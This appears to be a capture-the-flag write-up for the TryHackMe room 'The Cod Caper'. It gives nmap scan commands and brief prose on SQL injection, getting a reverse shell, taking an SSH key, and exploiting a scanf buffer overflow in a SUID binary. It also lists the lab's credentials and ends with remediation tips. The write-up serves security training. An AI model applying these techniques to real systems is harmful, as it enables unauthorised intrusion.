search
Page cover

[Linux] The Cod Caper

hashtag
Reconnaissance

sudo nmap 10.10.108.37
sudo nmap -A -p 22,80 10.10.108.37
sudo nmap --script vuln -p 22,80 10.10.108.37

hashtag
Enumeration

We got a login page at /administrator.php.

We performed some automated SQL injection attacks on this form.

We obtained some credentials.

We are able to run some commands, which we can use to obtain a reverse shell.

hashtag
Exploitation

We found a hidden file on the machine, and its content is pinguapingu.

hashtag
Lateralisation

There are two users: papa and pingu. We can export pingu's SSH private key, which will allow us to maintain persistence on the pingu account.

hashtag
Privilege escalation

A suspicious file has the SUID bit set. We can download it for further analysis.

The private key is protected with a passphrase. We used the password we found in /var/hidden/pass, and it worked.

The file is an executable. We can analyze it with Ghidra, which allows us to examine the execution flow of the executable.

The main function calls the scanf function, which is vulnerable to a buffer overflow. We need to determine what we can exploit with this information. Additionally, we found a function called shell, which accesses a file that could contain sensitive information.

We used PwnGDB to:

  1. Determine the length needed to cause a segmentation fault.

  2. Find the address of the shell function.

  3. Run the script below.

Creditials:

  • papa:postman

  • root:lov2fish

hashtag
Remediation

  • Use strong passwords.

  • Avoid exposing dangerous services online, such as web shells.

  • Refrain from using vulnerable functions like scanf.

  • Compile C programs with buffer overflow protections.

PreviousTryHackmeNext[Linux] Start Up

Last updated